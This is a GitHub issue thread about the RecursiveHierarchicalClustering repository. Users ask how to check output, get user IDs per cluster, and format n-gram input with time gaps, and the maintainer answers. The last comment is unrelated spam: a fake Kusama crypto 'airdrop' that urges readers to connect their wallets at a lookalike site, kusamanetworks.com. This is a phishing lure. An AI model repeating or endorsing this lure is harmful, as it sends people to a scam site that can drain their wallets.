### ISSUE TITLE
Just to verify my test result

### ISSUE THREAD

**Issue by ywu-stats** [xychang/RecursiveHierarchicalClustering#8]
Hi,

I was finally able to run it through with the sample data.
I just wanted to verify that my result look as expected(attached visualization). Very cool visualization though!
<img width="480" alt="test" src="https://user-images.githubusercontent.com/56888960/67532216-54c2b400-f67a-11e9-9525-4df95579f4a2.png">

**Comment by xychang** [comment]
Yes, the results look like it is supposed to!
Glad you figured it out by yourself! Nice work!

**Comment by ywu-stats** [comment]
Now you can tell how badly I wanted to make use of this.
So now I'm trying to figure out in each of the clusters, which userid are in it and what are the top ngrams shared in each of the cluster. Is it something I can easily get from the result.json? Or I have to print out in previous steps?

**Comment by xychang** [comment]
It's actually fairly easy to get the userid for each cluster. If you look at the visulization.py, you can see a function called `allUser`, which takes in a tree/sub-tree and returns all the users in it. For ways to traverse the tree structure, you can look at line 59-79 in visulization.py.

As to the ngrams, you can look at line 90-91 in visulization.py.

You might need a bit of knowledge in python to modify the code to suit your own needs, but it should be fairly straightforward.

**Comment by ywu-stats** [comment]
Thank you for the information! I'm indeed learning Python recently :)
Another question I have is that where can I change the length of ngrams?  I
remember in your publication you mentioned 5, but I only see one action per
feature in different test case I have.

**Comment by xychang** [comment]
Yes, you can indeed do any length you want. It's just a part of preprocessing which is not included in this code, which means you need to be able to write some preprocessing code.
If you check out the link below, you can see a more detailed description.
https://github.com/xychang/RecursiveHierarchicalClustering#frequently-asked-questions

**Comment by ywu-stats** [comment]
Hmmm...seems like it's the predefined input structure? Then I do want to clarify something about the methodology in the publication. My understanding was, the whole feature space is a union set of all possible Ngrams and the values are count of each Ngram appeared in whole path at userid level.

For example, from the path of ABCDEFG, if I set N-grams N=3 I should look at features={ABC,BCD,CDE,DEF,...EFG}, right? 
So you are saying, this Ngram is part of the data processing step and ABC etc. are predefined in input data. I'm confused about how I should format my input. Is it ABC()BCD()CDE()...? Or I only need to  modify the way of splitting the line for sid_seq?

**Comment by xychang** [comment]
Yes, the input format should be ABC()BCD()CDE(). This is because this
github repo is intended to be more general purpose than what is described
in the paper.
Hope this answers your question!

**Comment by ywu-stats** [comment]
I see, thanks!

**Comment by akhildevelops** [comment]
Hi @xychang 
In the paper it is mentioned that 5 as the optimal k value for creating K-Grams. Now if I understand it correctly below is what actions define from the point of view of the Repo.

Ex: A(5)B(7)
A => S1(g3)S2(g1)S3(g2)S4(g1)S2(g2)
B => S3(g1)S3(g1)S3(g2)S8(g1)S6(g1)

**Comment by xychang** [comment]
Hi @Enforcer007, when we say 5-gram, it actually includes the timegap. 
Following your example,
A => S1(g3)S2(g1)S3
B => S3(g1)S3(g1)S3

**Comment by akhildevelops** [comment]
Hi @xychang

Thanks for responding. I have 2 questions:

**Q1:**
Consider we go for 3 gram and below is the click stream:
Sequence = S1g1S2g2S1g1S3g1S4g2S2g3S4g1S1

Then what wud be T3(Sequence):

T3(Sequence) = {(S1g1S2),(g1,S2,g2),(S2,g2,S1),......}
OR
T3(Sequence) = {(S1g1S2),(S2,g2,S1),(S1,g1,S3),......}

**Q2**:
When you say it's 5 gram. I see in the visualisation there is a 3 gram pattern. Can you please explain. 

![doubt](https://user-images.githubusercontent.com/6951100/69217376-8e60df00-0b94-11ea-8db9-85246448de06.png)

Thanks

**Comment by xychang** [comment]
So, in our implementation, we actually included both 3 grams and 5 grams.
We found it to be helpful in practice.

**Comment by akhildevelops** [comment]
K, that's gr8. Can you pls confirm on Q1

Thanks

**Comment by xychang** [comment]
For q1, the answer would be the latter.

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)
